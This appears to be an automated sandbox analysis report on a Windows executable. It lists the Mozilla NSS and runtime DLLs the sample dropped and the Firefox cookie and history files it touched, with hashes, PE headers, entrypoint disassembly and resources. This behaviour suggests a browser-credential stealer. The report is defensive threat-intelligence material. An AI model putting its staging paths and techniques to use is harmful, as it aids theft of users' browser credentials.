                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\nss3.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2046288
                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\softokn3.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):257872
                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\vcruntime140.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80880
                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):685392
                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608080
                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):450024
                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2046288
                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):257872
                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80880
                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                    Malicious:false
                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                    Malicious:false
                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.3809715852323245
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:pYJeC4VJbw.exe
                                                                                                    File size:358'400 bytes
                                                                                                    MD5:14c3db1bdba407c23f0e80bbfdd6db0f
                                                                                                    SHA1:304c2d438d926f73f58f1ee9635b449b585dddce
                                                                                                    SHA256:596a9e9ed53dbeb50b69a93bfeef67855baf488f3638695b5485fd1c9633fad7
                                                                                                    SHA512:fb5588c6512f7fa4c9706d9f2990259a102a3acb80d0b65c89eec928626ec66d62eebf59a53979a260bdcf69c2c1fdbd7136327560bc0f526bb324ea4d1c5673
                                                                                                    SSDEEP:6144:tF8Izt905uwndEyT28p3W04Wkp58Kofd:H9zb05F9t3Kkf
                                                                                                    TLSH:B774BE41E1B0D822EF1A073D4926C6E4662EBC61AF77D24E725E765F1AF36E08523F01
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..\...\...\....B..]...B_..M...B_..;...B_..v...{...Y...\...,...B_..]...B_..]...B_..]...Rich\...........PE..L...s8lc...........

                                                                                                    File Icon

                                                                                                    Icon Hash:1321352d29170f17

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x401604
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x636C3873 [Wed Nov 9 23:32:03 2022 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:20a6a1c56501f5fd78f9b0e0618fa18b

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    call 00007F3971268178h
                                                                                                    jmp 00007F39712646DDh
                                                                                                    int3
                                                                                                    int3
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    test ecx, 00000003h
                                                                                                    je 00007F3971264886h
                                                                                                    mov al, byte ptr [ecx]
                                                                                                    add ecx, 01h
                                                                                                    test al, al
                                                                                                    je 00007F39712648B0h
                                                                                                    test ecx, 00000003h
                                                                                                    jne 00007F3971264851h
                                                                                                    add eax, 00000000h
                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                    mov eax, dword ptr [ecx]
                                                                                                    mov edx, 7EFEFEFFh
                                                                                                    add edx, eax
                                                                                                    xor eax, FFFFFFFFh
                                                                                                    xor eax, edx
                                                                                                    add ecx, 04h
                                                                                                    test eax, 81010100h
                                                                                                    je 00007F397126484Ah
                                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                                    test al, al
                                                                                                    je 00007F3971264894h
                                                                                                    test ah, ah
                                                                                                    je 00007F3971264886h
                                                                                                    test eax, 00FF0000h
                                                                                                    je 00007F3971264875h
                                                                                                    test eax, FF000000h
                                                                                                    je 00007F3971264864h
                                                                                                    jmp 00007F397126482Fh
                                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                    sub eax, ecx
                                                                                                    ret
                                                                                                    mov edi, edi
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 20h
                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000008h
                                                                                                    pop ecx
                                                                                                    mov esi, 0040C1FCh
                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                    rep movsd
                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                    pop edi
                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                    pop esi
                                                                                                    test eax, eax
                                                                                                    je 00007F397126486Eh
                                                                                                    test byte ptr [eax], 00000008h
                                                                                                    je 00007F3971264869h
                                                                                                    mov dword ptr [ebp-0Ch], 00000000h

                                                                                                    Rich Headers

                                                                                                    Programming Language:
                                                                                                    • [ASM] VS2008 build 21022
                                                                                                    • [ C ] VS2008 build 21022
                                                                                                    • [C++] VS2008 build 21022
                                                                                                    • [IMP] VS2005 build 50727
                                                                                                    • [RES] VS2008 build 21022
                                                                                                    • [LNK] VS2008 build 21022

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3d3cc0x3c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x26fc0000x182f8.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xc0000x184.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000xa8b30xaa001b0d94b73a531375c17c0d550876a936False0.6130744485294117data6.568276166644049IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0xc0000x31ca60x31e00b8b5ef8b47245d569657856709043747False0.7188625861528822data6.6625524725723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x3e0000x26bd33c0x280078ad3010e5ea8ba2068494691f2f08b6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x26fc0000x182f80x184009453d1d52925a8d5a542d9a50330b1d8False0.4410740173969072data5.058743856290898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    DOWOKEYOT0x270f0300xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6026771139405811
                                                                                                    RT_CURSOR0x270fc480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                    RT_CURSOR0x2710b080x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                    RT_CURSOR0x2710c380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                    RT_ICON0x26fc8400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.4144456289978678
                                                                                                    RT_ICON0x26fd6e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5370036101083032
                                                                                                    RT_ICON0x26fdf900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5910138248847926
                                                                                                    RT_ICON0x26fe6580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6611271676300579
                                                                                                    RT_ICON0x26febc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4900414937759336
                                                                                                    RT_ICON0x27011680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.5098499061913696
                                                                                                    RT_ICON0x27022100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5733606557377049
                                                                                                    RT_ICON0x2702b980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.598404255319149
                                                                                                    RT_ICON0x27030780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39285714285714285
                                                                                                    RT_ICON0x2703f200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5180505415162455
                                                                                                    RT_ICON0x27047c80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5766129032258065
                                                                                                    RT_ICON0x2704e900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6264450867052023
                                                                                                    RT_ICON0x27053f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4658713692946058
                                                                                                    RT_ICON0x27079a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.521311475409836
                                                                                                    RT_ICON0x27083280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5452127659574468
                                                                                                    RT_ICON0x27087f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.43336886993603413
                                                                                                    RT_ICON0x27096a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5636281588447654
                                                                                                    RT_ICON0x2709f480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5967741935483871
                                                                                                    RT_ICON0x270a6100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.6589595375722543
                                                                                                    RT_ICON0x270ab780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3755186721991701
                                                                                                    RT_ICON0x270d1200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.399859287054409
                                                                                                    RT_ICON0x270e1c80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.42008196721311475
                                                                                                    RT_ICON0x270eb500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.424645390070922
                                                                                                    RT_STRING0x27133e80x59cdata0.4415041782729805
                                                                                                    RT_STRING0x27139880xa0data0.5875
                                                                                                    RT_STRING0x2713a280x5c0data0.4375
                                                                                                    RT_STRING0x2713fe80x1cedata0.5021645021645021
                                                                                                    RT_STRING0x27141b80x13adata0.5031847133757962
                                                                                                    RT_ACCELERATOR0x270fc280x20data1.09375
                                                                                                    RT_GROUP_CURSOR0x2710af00x14data1.25
                                                                                                    RT_GROUP_CURSOR0x27131e00x22data1.088235294117647
                                                                                                    RT_GROUP_ICON0x27030000x76dataTurkishTurkey0.6610169491525424
                                                                                                    RT_GROUP_ICON0x27087900x68dataTurkishTurkey0.7019230769230769
                                                                                                    RT_GROUP_ICON0x270efb80x76dataTurkishTurkey0.6694915254237288
                                                                                                    RT_VERSION0x27132080x1e0data0.5708333333333333

                                                                                                    Imports

                                                                                                    DLLImport
